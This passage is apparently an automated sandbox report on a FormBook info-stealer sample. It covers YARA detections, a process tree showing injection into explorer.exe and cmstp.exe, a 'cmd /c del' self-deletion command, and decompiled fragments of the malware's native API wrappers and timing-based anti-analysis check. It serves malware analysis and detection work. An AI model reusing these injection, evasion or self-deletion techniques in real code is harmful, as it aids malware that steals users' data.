                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE8
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE8
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE8
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE8

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: 20210113432.exe PID: 1476 Parent PID: 5772

                                                    General

                                                    Start time:21:26:18
                                                    Start date:13/01/2021
                                                    Path:C:\Users\user\Desktop\20210113432.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\20210113432.exe'
                                                    Imagebase:0x920000
                                                    File size:1070592 bytes
                                                    MD5 hash:13DBC9C1C5A2811ECBEE5F420C9C75B6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: 20210113432.exe PID: 5320 Parent PID: 1476

                                                    General

                                                    Start time:21:26:26
                                                    Start date:13/01/2021
                                                    Path:C:\Users\user\Desktop\20210113432.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\20210113432.exe
                                                    Imagebase:0x940000
                                                    File size:1070592 bytes
                                                    MD5 hash:13DBC9C1C5A2811ECBEE5F420C9C75B6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: explorer.exe PID: 3292 Parent PID: 5320

                                                    General

                                                    Start time:21:26:29
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff662bf0000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: cmstp.exe PID: 5300 Parent PID: 3292

                                                    General

                                                    Start time:21:26:41
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\SysWOW64\cmstp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                    Imagebase:0xde0000
                                                    File size:82944 bytes
                                                    MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: cmd.exe PID: 6292 Parent PID: 5300

                                                    General

                                                    Start time:21:26:46
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\Desktop\20210113432.exe'
                                                    Imagebase:0x12c0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: conhost.exe PID: 6328 Parent PID: 6292

                                                    General

                                                    Start time:21:26:46
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff774ee0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >

                                                      Analysis Process: 20210113432.exe PID: 1476 Parent PID: 5772 20210113432.exeCOMMON

                                                      Executed Functions

                                                      Non-executed Functions

                                                      Function 009251A1, Relevance: 1.7, Instructions: 1664COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, Offset: 00920000, based on PE: true
                                                      • Associated: 00000000.00000002.253947574.0000000000920000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000000.00000002.253992392.000000000098E000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000000.00000002.254070147.0000000000A28000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 75fdfc5818f41762e4acd7d35da19c01546e96e659746ebab7555630c8d67061
                                                      • Instruction ID: bbb5c92a33237c1c29dfbcb4154ad99eb1964148db88a393bec4594fc299b355
                                                      • Opcode Fuzzy Hash: 75fdfc5818f41762e4acd7d35da19c01546e96e659746ebab7555630c8d67061
                                                      • Instruction Fuzzy Hash: D5E24A6240EBD29FD7038B749D75191BFB1AE1322431E84CBC4C18F4B7E2295A5ADB72
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: 20210113432.exe PID: 5320 Parent PID: 1476 20210113432.exeCOMMON

                                                      Executed Functions

                                                      Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                      0x00419e03
                                                      0x00419e0f
                                                      0x00419e17
                                                      0x00419e22
                                                      0x00419e3d
                                                      0x00419e45
                                                      0x00419e49

                                                      APIs
                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: 2MA$2MA
                                                      • API String ID: 2738559852-947276439
                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                      0x00419d5f
                                                      0x00419d67
                                                      0x00419d89
                                                      0x00419d9d
                                                      0x00419da1

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: wKA
                                                      • API String ID: 823142352-3165208591
                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040ACC0(void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				void* _v16;
				char _v536;
				void* _t19;
				intOrPtr _t29;

				_t29 = _a8;
				_v8 =  &_v536;
				_t19 = E0041C640( &_v12, 0x104, _t29);
				if(_t19 != 0) {
					E0041CA60(__eflags, _v8);
					_t6 = __esi + _t29 - 0x73;
					 *_t6 =  *(__esi + _t29 - 0x73) << 0x4d;
					__eflags =  *_t6;
				} else {
					return _t19;
				}
			}









                                                      0x0040acc9
                                                      0x0040acdc
                                                      0x0040acdf
                                                      0x0040ace9
                                                      0x0040acf3
                                                      0x0040acfc
                                                      0x0040acfc
                                                      0x0040acfc
                                                      0x0040acee
                                                      0x0040acee
                                                      0x0040acee

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                      • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                                      • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                      • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                      0x00419f3f
                                                      0x00419f47
                                                      0x00419f69
                                                      0x00419f6d

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00419E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                      0x00419e83
                                                      0x00419e86
                                                      0x00419e8f
                                                      0x00419e97
                                                      0x00419ea5
                                                      0x00419ea9

                                                      APIs
                                                      • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E00409A80(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B800( &_v284, 0x104);
						E0041BE70( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                      0x00409a8b
                                                      0x00409a93
                                                      0x00409a95
                                                      0x00409a9a
                                                      0x00409a9f
                                                      0x00409ab2
                                                      0x00409ab7
                                                      0x00409ac0
                                                      0x00409acc
                                                      0x00409adf
                                                      0x00409ae4
                                                      0x00409ae7
                                                      0x00409af0
                                                      0x00409b02
                                                      0x00409b07
                                                      0x00409b0c
                                                      0x00000000
                                                      0x00000000
                                                      0x00409b0e
                                                      0x00409b12
                                                      0x00000000
                                                      0x00000000
                                                      0x00409b14
                                                      0x00000000
                                                      0x00409b12
                                                      0x00409b16
                                                      0x00409b19
                                                      0x00409b1f
                                                      0x00409b21
                                                      0x00409b2c
                                                      0x00409b31
                                                      0x00409b34
                                                      0x00409b41
                                                      0x00409b4c
                                                      0x00409b4e
                                                      0x00409b54
                                                      0x00409b58
                                                      0x00409b5b
                                                      0x00409b5b
                                                      0x00409b62
                                                      0x00409b65
                                                      0x00409b6a
                                                      0x00409b77
                                                      0x00409aa6
                                                      0x00409aa6
                                                      0x00409aa6

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                      • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                                      • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                      • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}





                                                      0x0041a037
                                                      0x0041a03c
                                                      0x0041a04d
                                                      0x00000000

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: oLA
                                                      • API String ID: 1279760036-3789366272
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t24 = _a4 + 0x1c;
				_t12 = E0040ACC0(_a4 + 0x1c, _t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_t24, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                                      0x004082f0
                                                      0x004082ff
                                                      0x00408303
                                                      0x0040830e
                                                      0x0040831a
                                                      0x0040831e
                                                      0x0040832e
                                                      0x00408333
                                                      0x0040833a
                                                      0x0040833d
                                                      0x0040834a
                                                      0x0040834c
                                                      0x0040834e
                                                      0x0040836b
                                                      0x0040836b
                                                      0x00000000
                                                      0x0040836d
                                                      0x00408372

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                                      • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                                      • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                                      • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A092, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 23%
                                                      			E0041A092(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a44, signed char _a48, intOrPtr _a52) {
				void* _v0;
				char _v1;
				char _v5;
				void* __esi;
				void* _t23;
				signed char _t26;
				intOrPtr _t30;
				void* _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;
				char* _t48;

				_t32 = __ebx;
				_t48 =  &_v1;
				if(_t48 != 0) {
					asm("a16 das");
					_t24 = _a4;
					_t8 = _t24 + 0xa14; // 0xfffde485
					_t9 = _t24 + 0xc80; // 0x409989
					_t45 = _t9;
					E0041A950(_t43, _a4, _t45,  *_t8, 0, 0x37);
					_t39 = _a52;
					_t26 = _a48;
					_t35 = _a44;
					 *(_t32 - 0x74adeb3c) =  *(_t32 - 0x74adeb3c) ^ _t26;
					__eflags = _t26 - 0x50;
					_t30 = _a12;
					_t38 = _a8;
					_t42 =  *_t45;
					return  *_t42(_t38, _t30, _a16, _a20, _a24, _a28, _a32, _a36, _t39, _t35,  &_v5, _t44, _t48);
				} else {
					_push(__esi);
					asm("pushad");
					_t1 = __esi + 0x2c8efa8c;
					 *_t1 =  *(__esi + 0x2c8efa8c) << __cl;
					__eflags =  *_t1;
					if(__eflags < 0) {
						return _t23;
					} else {
						if (__eflags != 0) goto L8;
					}
				}
			}



















                                                      0x0041a092
                                                      0x0041a092
                                                      0x0041a093
                                                      0x0041a0ce
                                                      0x0041a0d3
                                                      0x0041a0d6
                                                      0x0041a0e2
                                                      0x0041a0e2
                                                      0x0041a0ea
                                                      0x0041a0ef
                                                      0x0041a0f2
                                                      0x0041a0f5
                                                      0x0041a0f7
                                                      0x0041a0fe
                                                      0x0041a118
                                                      0x0041a11c
                                                      0x0041a120
                                                      0x0041a128
                                                      0x0041a095
                                                      0x0041a095
                                                      0x0041a096
                                                      0x0041a097
                                                      0x0041a097
                                                      0x0041a097
                                                      0x0041a09d
                                                      0x0041a051
                                                      0x0041a09f
                                                      0x0041a09f
                                                      0x0041a0a0
                                                      0x0041a09d

                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: ffd399804928e5a94bd0c7cd9717840f324ea3332871a564f449a46c58c82c47
                                                      • Instruction ID: 0733ed48125a0f515b6e9ec3ac543325407c1a8d22f704619cc37df608b01975
                                                      • Opcode Fuzzy Hash: ffd399804928e5a94bd0c7cd9717840f324ea3332871a564f449a46c58c82c47
                                                      • Instruction Fuzzy Hash: B7015AB2201108ABCB14DF99DC85DE77BADEF8C350F118659FA4C97241D235E861CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040ACB6, Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E0040ACB6(signed int __ebx, signed int __ecx, signed int __esi, void* _a8, signed int _a12) {
				char* _v4;
				char _v8;
				void* _v12;
				char _v532;
				void* _t26;
				signed int _t30;
				void* _t37;
				void* _t40;
				void* _t45;

				_t36 = __esi;
